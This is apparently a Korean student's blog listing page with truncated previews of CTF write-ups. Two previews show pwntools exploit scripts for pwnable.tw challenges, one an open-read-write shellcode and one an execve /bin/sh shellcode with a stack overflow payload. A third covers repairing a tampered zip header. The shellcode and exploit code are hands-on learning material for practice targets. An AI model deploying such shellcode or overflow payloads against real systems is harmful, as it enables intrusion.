목록잡다한거.. (13)
hOwDayS 선린 10720
쉘코드를 만드는 연습을 해봤다.. syscall은 https://syscalls.kernelgrok.com/ 를 참고하자. 1234567891011121314151617181920212223242526272829from pwn import * #p = process("./orw")p = remote("chall.pwnable.tw",10001) payload = asm("xor ecx , ecx ; xor edx , edx; xor eax , eax; xor ebx , ebx")payload += asm("push 0") # /home/orw///flagpayload += asm("push 0x67616c66")payload += asm("push 0x2f2f7772")payload += asm("pus..
sendline 대신 send를 애용하자.. 1234567891011121314151617181920212223242526272829from pwn import * context(arch='i386',os='linux') p = process("./start") mov_esp_ecx = 0x08048087 #Start addr of Stack p.recvuntil(':') shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" payload = "\x90" * 0x14 #buf_1payload += p32(mov_esp_ecx) #st..
TeamLog에서 주최한 LogCon의 마지막문제인 JS 제국 문제 풀이...까맣게 잊고 있다가 선린고 신입생교육때 zip헤더 생각이 갑자기 나서개인적으로 문제 파일을 요청한다음 풀었다. 파일을 가져와서 zip으로 저장하자 헥스를 보면 zip헤더가 이상한 것을 볼 수 있다. 비교를 하기 위해 zip 안에있는 star.cpp 와 크기와 이름은 같은 파일을 생성한 후 압축하여 헤더를 비교를 해봤다 star.zip = 내가 만든파일 JDEMPIRE - 문제 파일 두헤더를 비교하면 빨간 색으로 된 부분은 공통적으로 있다는 것을 알 수 있다. = 그 이전에 헤더를 수정하면 zip을 복구 할 수 있다. Zip 특성상 위에 헤더와 밑의 헥스가 비슷 한 것을 볼 수 있는데예로 들어 star.zip의 헤더를 비교해보면 ..